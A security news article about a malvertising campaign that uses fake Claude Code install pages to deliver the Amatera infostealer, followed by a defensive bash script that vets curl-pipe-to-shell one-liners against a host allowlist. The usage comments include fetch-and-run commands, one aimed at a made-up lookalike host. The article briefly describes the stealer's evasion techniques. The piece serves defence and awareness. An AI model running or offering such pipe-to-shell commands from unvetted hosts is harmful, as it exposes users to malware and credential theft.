The fake install pages are distributed exclusively through Google Ads
In the fast-paced world of AI development, “vibe-coding” has become a popular term for rapid, experimental building. However, a new campaign identified by Push researchers proves that even the trendiest tools aren’t safe from old-school tactics. Attackers are currently targeting Anthropic’s Claude Code, one of the fastest-growing developer tools, using a sophisticated “InstallFix” malvertising scheme.
Claude Code is a command-line AI assistant that has quickly become a staple for everyone from senior engineers to amateur builders. The researchers note: “All you need to make this attack work is a popular tool you can impersonate. Naturally, this makes trendy AI tools a popular choice.”
The campaign relies on malvertising—boosting a malicious lure through sponsored search engine results to intercept users looking for the official installation page.
The execution is straightforward but highly effective:
- Attackers created a “near-pixel-perfect replica” of the real Claude Code installation page, complete with the official branding, layout, and documentation sidebar.
- Like many CLI tools, Claude Code is typically installed via a terminal command that pipes a remote script into a shell. The attackers updated these instructions with a single, critical change: “instead of fetching the install script from claude.ai, the commands point to an attacker-controlled server that serves malware instead”.
- To blend in with legitimate traffic, the campaign abuses trusted hosting services like Cloudflare Pages (pages.dev), Squarespace, and Tencent EdgeOne.
The ultimate goal of the “InstallFix” campaign is the deployment of Amatera, a potent information stealer. Amatera is an evolution of the older ACR Stealer and is currently sold via subscription to various criminal operators.
Once it hits a system, Amatera is designed to be a “ghost in the machine”. It uses several advanced techniques to bypass security software (AV/EDR), including:
- Direct NTSockets for communicating with its Command and Control (C2) server.
- Dynamic API resolution and WoW64 Syscalls to hide its activity from monitoring tools.
- CDN Masking: The malware communicates using hardcoded IP addresses belonging to legitimate CDNs, making the traffic “difficult to block without disrupting legitimate services”.
This campaign highlights a growing trend of attackers impersonating popular tools to deliver malware via sponsored search results. Developers should double-check the URL before running any installation “one-liner” in their terminal.
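The single change the attackers made, described above, is the host in the `curl ... | sh` line. As an added example (not code from the Push report or from Anthropic), the shell functions below vet a pasted install one-liner before anything runs: they pull out the URL, compare its host exactly against an allowlist, and, only if it passes, download the script to a file for review instead of piping it into a shell. The allowed host `claude.ai` comes from the report; the install path and the lookalike hostnames in the usage comments are constructed for illustration, and `sha256sum` is assumed to be present (use `shasum -a 256` on macOS).

```shell
#!/usr/bin/env bash
# Added example, not from the Push report or Anthropic: vet a pasted
# "curl ... | sh" install one-liner before executing anything.
# Allowlist entry "claude.ai" is from the report; sample paths and
# lookalike hosts in the usage comments are constructed.

# Print the first http(s) URL found in a one-liner, or nothing.
extract_url() {
    printf '%s\n' "$1" | grep -oE 'https?://[^ |"'"'"'<>]+' | head -n 1
}

# Print the host part of a URL: strip scheme, userinfo, port and path,
# then lowercase it so case tricks in the ad copy do not matter.
url_host() {
    local rest="${1#*://}"
    rest="${rest%%/*}"
    rest="${rest##*@}"
    rest="${rest%%:*}"
    printf '%s\n' "$rest" | tr 'A-Z' 'a-z'
}

# Return 0 if the host exactly matches one entry of a space-separated
# allowlist. Exact match on purpose: "claude.ai.evil.example" or
# "claude-code.pages.dev" must not pass just because they contain the name.
host_allowed() {
    local host="$1" allowed
    for allowed in $2; do
        [ "$host" = "$allowed" ] && return 0
    done
    return 1
}

# Vet a one-liner: print the URL and return 0 if its host is allowed,
# otherwise explain the refusal on stderr and return 1. Nothing is executed.
vet_one_liner() {
    local line="$1" allowlist="$2" url host
    url=$(extract_url "$line")
    if [ -z "$url" ]; then
        echo "refuse: no URL found in command" >&2
        return 1
    fi
    host=$(url_host "$url")
    if ! host_allowed "$host" "$allowlist"; then
        echo "refuse: host '$host' is not in allowlist ($allowlist)" >&2
        return 1
    fi
    printf '%s\n' "$url"
}

# Download a vetted script to a file for reading, never straight into sh.
# Needs network, so it is only called after vet_one_liner succeeds.
fetch_for_review() {
    local url="$1" out="${2:-./install-script.review.sh}"
    curl -fsSL "$url" -o "$out" && sha256sum "$out" \
        && echo "review $out before running it"
}

# Usage with constructed sample commands (the pages.dev host is a made-up
# lookalike on one of the hosting services the report names):
#   vet_one_liner 'curl -fsSL https://claude.ai/install.sh | bash' 'claude.ai'
#     -> prints https://claude.ai/install.sh, exit status 0
#   vet_one_liner 'curl -fsSL https://claude-code.pages.dev/install.sh | bash' 'claude.ai'
#     -> refuse: host 'claude-code.pages.dev' is not in allowlist, exit status 1
```

The allowlist check is deliberately an exact string comparison rather than a substring or regex match: the replica pages in this campaign sit on legitimate hosting domains, so any rule that accepts "contains claude" would accept exactly the lures the report describes.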
The researchers discovered that “different sites were executing identical binaries,” confirming that this is a wide-reaching, coordinated campaign. As AI tools continue to grow in popularity, so will the efforts of threat actors to capitalize on their “vibe.”